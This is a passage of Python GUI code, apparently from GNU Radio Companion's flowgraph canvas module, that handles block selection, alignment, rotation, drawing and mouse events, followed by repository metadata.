        self.selected_elements.add(connection)
###########################################################################
# Modify Selected
###########################################################################
def type_controller_modify_selected(self, direction):
    """
    Change the registered type controller for the selected signal blocks.

    Args:
        direction: +1 or -1

    Returns:
        true for change
    """
    # Evaluate eagerly for EVERY selected block: a generator inside
    # any() would short-circuit and skip modifying later blocks.
    results = [blk.type_controller_modify(direction)
               for blk in self.selected_blocks()]
    return any(results)
def port_controller_modify_selected(self, direction):
    """
    Change port controller for the selected signal blocks.

    Args:
        direction: +1 or -1

    Returns:
        true for changed
    """
    # Evaluate eagerly for EVERY selected block (no short-circuit).
    results = [blk.port_controller_modify(direction)
               for blk in self.selected_blocks()]
    return any(results)
def change_state_selected(self, new_state):
    """
    Enable/disable the selected blocks.

    Args:
        new_state: a block state

    Returns:
        true if at least one block's state actually changed
    """
    changed = False
    for block in self.selected_blocks():
        if block.state != new_state:
            changed = True
        block.state = new_state
    return changed
def move_selected(self, delta_coordinate):
    """
    Move every selected block by the given offset.

    Args:
        delta_coordinate: the (dx, dy) change in coordinates
    """
    for block in self.selected_blocks():
        block.move(delta_coordinate)
        # flag is only set when something was actually moved
        self.element_moved = True
def align_selected(self, calling_action=None):
    """
    Align the selected blocks along an edge or center line.

    Args:
        calling_action: one of the Actions.BLOCK_?ALIGN_* actions

    Returns:
        True if changed, otherwise False
    """
    blocks = list(self.selected_blocks())
    if not blocks or calling_action is None:
        return False
    # bounding box of the selection (assumes non-negative block sizes)
    min_x = min(blk.coordinate[0] for blk in blocks)
    min_y = min(blk.coordinate[1] for blk in blocks)
    max_x = max(blk.coordinate[0] + blk.width for blk in blocks)
    max_y = max(blk.coordinate[1] + blk.height for blk in blocks)
    ctr_x, ctr_y = (max_x + min_x) / 2, (max_y + min_y) / 2
    # pick the coordinate transform matching the requested alignment
    transform = {
        Actions.BLOCK_VALIGN_TOP: lambda x, y, w, h: (x, min_y),
        Actions.BLOCK_VALIGN_MIDDLE: lambda x, y, w, h: (x, ctr_y - h / 2),
        Actions.BLOCK_VALIGN_BOTTOM: lambda x, y, w, h: (x, max_y - h),
        Actions.BLOCK_HALIGN_LEFT: lambda x, y, w, h: (min_x, y),
        Actions.BLOCK_HALIGN_CENTER: lambda x, y, w, h: (ctr_x - w / 2, y),
        Actions.BLOCK_HALIGN_RIGHT: lambda x, y, w, h: (max_x - w, y),
    }.get(calling_action, lambda *args: args)
    for blk in blocks:
        x, y = blk.coordinate
        blk.coordinate = transform(x, y, blk.width, blk.height)
    return True
def rotate_selected(self, rotation):
    """
    Rotate the selected blocks by multiples of 90 degrees
    about the center of their bounding box.

    Args:
        rotation: the rotation in degrees

    Returns:
        true if changed, otherwise false.
    """
    if not any(self.selected_blocks()):
        return False
    # rotate each block in place while tracking the bounding box
    min_x, min_y = max_x, max_y = self.selected_block.coordinate
    for block in self.selected_blocks():
        block.rotate(rotation)
        x, y = block.coordinate
        min_x, min_y = min(min_x, x), min(min_y, y)
        max_x, max_y = max(max_x, x), max(max_y, y)
    # pivot every block around the selection's center point
    ctr_x, ctr_y = (max_x + min_x) / 2, (max_y + min_y) / 2
    for block in self.selected_blocks():
        rel = (block.coordinate[0] - ctr_x, block.coordinate[1] - ctr_y)
        rot_x, rot_y = Utils.get_rotated_coordinate(rel, rotation)
        block.coordinate = (rot_x + ctr_x, rot_y + ctr_y)
    return True
def remove_selected(self):
    """
    Remove all currently selected elements from the flow graph.

    Returns:
        True if at least one element was removed.
    """
    changed = False
    # Iterate over a snapshot: remove_element() may mutate
    # self.selected_elements while we are walking it, which would
    # raise "set changed size during iteration".
    for selected_element in list(self.selected_elements):
        self.remove_element(selected_element)
        changed = True
    return changed
def update_selected(self):
    """
    Remove deleted elements from the selected elements list.
    Update highlighting so only the selected are highlighted.
    """
    live = self.get_elements()
    selection = self.selected_elements
    # drop selections that no longer exist in the flow graph
    for stale in [s for s in selection if s not in live]:
        selection.remove(stale)
    # forget remembered ports whose parent was deleted
    if self._old_selected_port and self._old_selected_port.parent not in live:
        self._old_selected_port = None
    if self._new_selected_port and self._new_selected_port.parent not in live:
        self._new_selected_port = None
    # highlight exactly the selected elements
    for element in live:
        element.highlighted = element in selection
###########################################################################
# Draw stuff
###########################################################################
def update_elements_to_draw(self):
    """
    Rebuild the in-place list of visible elements, sorted so that
    highlighted elements and blocks are drawn last (on top).
    """
    hide_disabled_blocks = Actions.TOGGLE_HIDE_DISABLED_BLOCKS.get_active()
    hide_variables = Actions.TOGGLE_HIDE_VARIABLES.get_active()

    def visible(element):
        if hide_disabled_blocks and not element.enabled:
            return False  # skip hidden disabled blocks and connections
        if hide_variables and (element.is_variable or element.is_import):
            return False  # skip hidden variable/import blocks
        return True

    ordered = sorted(self.get_elements(),
                     key=lambda e: (e.highlighted, e.is_block, e.enabled))
    # mutate the existing list in place (other code may hold a reference)
    self._elements_to_draw[:] = [e for e in ordered if visible(e)]
def create_labels(self, cr=None):
    """Create labels for every drawable element (cr: optional cairo context)."""
    for drawable in self._elements_to_draw:
        drawable.create_labels(cr)
def create_shapes(self):
    """
    Create shapes for every drawable element, blocks first.

    Blocks must be shaped before connections so that (bus) port
    coordinates exist when the connections are drawn (workaround).
    """
    # stable sort: blocks keep their order and come before non-blocks
    for element in sorted(self._elements_to_draw, key=lambda e: not e.is_block):
        element.create_shapes()
def _drawables(self):
    """
    Yield bound draw callables in paint order: block comments first
    (underneath), then any in-flight connection, then unselected
    elements, and finally the selected elements on top.
    """
    # todo: cache that
    show_comments = Actions.TOGGLE_SHOW_BLOCK_COMMENTS.get_active()
    hide_disabled = Actions.TOGGLE_HIDE_DISABLED_BLOCKS.get_active()
    to_draw = self._elements_to_draw
    selection = self.selected_elements
    yield from (e.draw_comment for e in to_draw
                if e.is_block and show_comments and e.enabled)
    if self._new_connection is not None:
        yield self._new_connection.draw
    yield from (e.draw for e in to_draw if e not in selection)
    yield from (e.draw for e in selection
                if e.enabled or not hide_disabled)
def draw(self, cr):
    """Draw blocks connections comment and select rectangle"""
    for render in self._drawables():
        cr.save()
        render(cr)
        cr.restore()
    # rubber-band rectangle: only while the mouse is pressed over empty
    # canvas (or with ctrl held) and no connection is being dragged
    if not self.mouse_pressed or self._new_connection:
        return
    if self.selected_elements and not self.drawing_area.ctrl_mask:
        return
    x1, y1 = self.press_coor
    x2, y2 = self.coordinate
    x, y = int(min(x1, x2)), int(min(y1, y2))
    w, h = int(abs(x1 - x2)), int(abs(y1 - y2))
    cr.set_source_rgba(
        colors.HIGHLIGHT_COLOR[0],
        colors.HIGHLIGHT_COLOR[1],
        colors.HIGHLIGHT_COLOR[2],
        0.5,
    )
    cr.rectangle(x, y, w, h)
    cr.fill()
    cr.rectangle(x, y, w, h)
    cr.stroke()
##########################################################################
# selection handling
##########################################################################
def update_selected_elements(self):
    """
    Update the selected elements.
    The update behavior depends on the state of the mouse button.
    When the mouse button pressed the selection will change when
    the control mask is set or the new selection is not in the current group.
    When the mouse button is released the selection will change when
    the mouse has moved and the control mask is set or the current group is empty.
    Attempt to make a new connection if the old and ports are filled.
    If the control mask is set, merge with the current elements.
    """
    # None means "leave the selection alone"; an (even empty) set replaces it
    selected_elements = None
    if self.mouse_pressed:
        new_selections = self.what_is_selected(self.coordinate)
        # update the selections if the new selection is not in the current selections
        # allows us to move entire selected groups of elements
        if not new_selections:
            selected_elements = set()
        elif self.drawing_area.ctrl_mask or self.selected_elements.isdisjoint(new_selections):
            selected_elements = new_selections
        # toggle the forced port-label visibility for the remembered ports
        if self._old_selected_port:
            self._old_selected_port.force_show_label = False
            self.create_shapes()
            self.drawing_area.queue_draw()
        elif self._new_selected_port:
            self._new_selected_port.force_show_label = True
    else:  # called from a mouse release
        if not self.element_moved and (not self.selected_elements or self.drawing_area.ctrl_mask) and not self._new_connection:
            # rubber-band (multi) selection between press and release points
            selected_elements = self.what_is_selected(self.coordinate, self.press_coor)
    # this selection and the last were ports, try to connect them
    if self.make_connection():
        return
    # update selected elements
    if selected_elements is None:
        return
    # if ctrl, set the selected elements to the union - intersection of old and new
    if self.drawing_area.ctrl_mask:
        self.selected_elements ^= selected_elements
    else:
        self.selected_elements.clear()
        self.selected_elements.update(selected_elements)
    Actions.ELEMENT_SELECT()
def what_is_selected(self, coor, coor_m=None):
    """
    What is selected?
    At the given coordinate, return the elements found to be selected.
    If coor_m is unspecified, return a list of only the first element found to be selected:
    Iterate though the elements backwards since top elements are at the end of the list.
    If an element is selected, place it at the end of the list so that is is drawn last,
    and hence on top. Update the selected port information.

    Side effects: may start a DummyConnection drag when a source port is
    hit, and updates self._old_selected_port/_new_selected_port.

    Args:
        coor: the coordinate of the mouse click
        coor_m: the coordinate for multi select

    Returns:
        the selected blocks and connections or an empty list
    """
    selected_port = None
    selected = set()
    # check the elements (reversed: top-most drawn elements win)
    for element in reversed(self._elements_to_draw):
        selected_element = element.what_is_selected(coor, coor_m)
        if not selected_element:
            continue
        # update the selected port information; a port click selects
        # its parent block instead of the port itself
        if selected_element.is_port:
            if not coor_m:
                selected_port = selected_element
            selected_element = selected_element.parent_block
        selected.add(selected_element)
        # single-click selection stops at the first (top-most) hit
        if not coor_m:
            break
    if selected_port and selected_port.is_source:
        # clicking a source port starts dragging a new connection
        # instead of selecting the block
        selected.remove(selected_port.parent_block)
        self._new_connection = DummyConnection(selected_port, coordinate=coor)
        self.drawing_area.queue_draw()
    # update selected ports (remember previous for connection making)
    if selected_port is not self._new_selected_port:
        self._old_selected_port = self._new_selected_port
        self._new_selected_port = selected_port
    return selected
def unselect(self):
    """
    Clear the selection: set selected elements to an empty set.
    """
    self.selected_elements.clear()
def select_all(self):
    """Select all blocks in the flow graph"""
    selection = self.selected_elements
    selection.clear()
    selection.update(self._elements_to_draw)
def selected_blocks(self):
    """
    Get a group of selected blocks.

    Returns:
        generator over the selected elements that are blocks
    """
    return (element for element in self.selected_elements
            if element.is_block)
@property
def selected_block(self):
    """
    Get the selected block when a block or port is selected.

    Returns:
        a block or None
    """
    for block in self.selected_blocks():
        return block
    return None
def get_selected_elements(self):
    """
    Get the group of selected elements.

    Returns:
        the (mutable) set of selected elements in this flow graph
    """
    return self.selected_elements
def get_selected_element(self):
    """
    Get the selected element.

    Returns:
        a block, port, or connection or None (arbitrary member of the
        selection set when more than one element is selected)
    """
    for element in self.selected_elements:
        return element
    return None
##########################################################################
# Event Handlers
##########################################################################
def handle_mouse_context_press(self, coordinate, event):
    """
    The context mouse button was pressed:
    If no elements were selected, perform re-selection at this coordinate.
    Then, show the context menu at the mouse click location.
    """
    selections = self.what_is_selected(coordinate)
    if not selections.intersection(self.selected_elements):
        # right-click outside the current selection: re-select under
        # the cursor (simulate a press/release cycle)
        self.coordinate = coordinate
        self.mouse_pressed = True
        self.update_selected_elements()
        self.mouse_pressed = False
    # a context click on a source port would have started a drag;
    # cancel that in-flight connection
    if self._new_connection:
        self._new_connection = None
        self.drawing_area.queue_draw()
    self._context_menu.popup(event)
def handle_mouse_selector_press(self, double_click, coordinate):
    """
    The selector mouse button was pressed:
    record the press position, refresh the selection, and on a
    double click open the properties dialog of the selected block.
    """
    self.press_coor = self.coordinate = coordinate
    self.mouse_pressed = True
    if double_click:
        # a double click re-selects from scratch
        self.unselect()
    self.update_selected_elements()
    if not double_click:
        return
    if self.selected_block:
        self.mouse_pressed = False
        Actions.BLOCK_PARAM_MODIFY()
def handle_mouse_selector_release(self, coordinate):
    """
    The selector mouse button was released:
    finish any block drag (recording the move for undo), refresh the
    selection, and cancel an in-flight connection.
    """
    self.coordinate = coordinate
    self.mouse_pressed = False
    if self.element_moved:
        # a drag just finished; record it
        Actions.BLOCK_MOVE()
        self.element_moved = False
    self.update_selected_elements()
    if self._new_connection:
        self._new_connection = None
        self.drawing_area.queue_draw()
def handle_mouse_motion(self, coordinate):
    """
    Dispatch mouse motion to hover handling and/or drag handling,
    and queue a redraw when either reports a visual change.
    """
    # to perform a movement, the mouse must be pressed
    # (no longer checking pending events via Gtk.events_pending() - always true in Windows)
    needs_redraw = False
    # hover handling while not dragging, or while dragging a new connection
    if self._new_connection or not self.mouse_pressed:
        needs_redraw = self._handle_mouse_motion_move(coordinate)
    # drag handling whenever the button is held (skip if already redrawing)
    if self.mouse_pressed and not needs_redraw:
        needs_redraw = self._handle_mouse_motion_drag(coordinate)
    if needs_redraw:
        self.drawing_area.queue_draw()
def _handle_mouse_motion_move(self, coordinate):
    """
    Track the element under the mouse and fire mouse_over/mouse_out
    hooks; rebuild shapes when a hook asks for a redraw.

    Returns:
        truthy when a redraw is needed; None when auto-hide port
        labels is disabled (treated as falsy by the caller)
    """
    # only continue if mouse-over stuff is enabled (just the auto-hide port label stuff for now)
    redraw = False
    for element in self._elements_to_draw:
        over_element = element.what_is_selected(coordinate)
        if not over_element:
            continue
        if over_element != self.element_under_mouse:  # over sth new
            if self.element_under_mouse:
                # mouse_out()/mouse_over() may return None; coerce to bool
                redraw |= self.element_under_mouse.mouse_out() or False
            self.element_under_mouse = over_element
            redraw |= over_element.mouse_over() or False
        break
    else:
        # no element hit at all: leave whatever was hovered before
        if self.element_under_mouse:
            redraw |= self.element_under_mouse.mouse_out() or False
            self.element_under_mouse = None
    # NOTE(review): this bare return yields None (not the computed
    # redraw) when the label auto-hide toggle is off — the caller
    # treats both as falsy, but confirm this is intentional
    if not Actions.TOGGLE_AUTO_HIDE_PORT_LABELS.get_active():
        return
    if redraw:
        # self.create_labels()
        self.create_shapes()
    return redraw
def _handle_mouse_motion_drag(self, coordinate):
    """
    Handle a drag step: feed an in-flight connection, or move the
    selected elements (honoring snap-to-grid).

    Returns:
        True when a redraw is needed
    """
    redraw = False
    # remove the connection if selected in drag event
    if len(self.selected_elements) == 1 and self.get_selected_element().is_connection:
        Actions.ELEMENT_DELETE()
        redraw = True
    if self._new_connection:
        # dragging a new connection: snap to a sink port under the
        # mouse, otherwise follow the cursor
        e = self.element_under_mouse
        if e and e.is_port and e.is_sink:
            self._new_connection.update(sink_port=self.element_under_mouse)
        else:
            self._new_connection.update(coordinate=coordinate, rotation=0)
        return True
    # move the selected elements and record the new coordinate
    x, y = coordinate
    if not self.drawing_area.ctrl_mask:
        X, Y = self.coordinate
        dX, dY = int(x - X), int(y - Y)
        # with snap-to-grid (or mod1 held), only move in whole grid steps
        active = Actions.TOGGLE_SNAP_TO_GRID.get_active() or self.drawing_area.mod1_mask
        if not active or abs(dX) >= Constants.CANVAS_GRID_SIZE or abs(dY) >= Constants.CANVAS_GRID_SIZE:
            self.move_selected((dX, dY))
            self.coordinate = (x, y)
            redraw = True
    return redraw
def get_extents(self):
    """
    Return the bounding box (x_min, y_min, x_max, y_max) of all drawn
    elements, including visible block comments.
    """
    show_comments = Actions.TOGGLE_SHOW_BLOCK_COMMENTS.get_active()

    def sub_extents():
        for element in self._elements_to_draw:
            yield element.get_extents()
            if element.is_block and show_comments and element.enabled:
                yield element.get_extents_comment()

    # fold every (x1, y1, x2, y2) extent into one enclosing box
    x_min = y_min = 10000000
    x_max = y_max = 0
    for x1, y1, x2, y2 in sub_extents():
        x_min, y_min = min(x_min, x1), min(y_min, y1)
        x_max, y_max = max(x_max, x2), max(y_max, y2)
    return (x_min, y_min, x_max, y_max)
|
mrjacobagilbert/gnuradio
|
grc/gui/canvas/flowgraph.py
|
Python
|
gpl-3.0
| 30,369
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.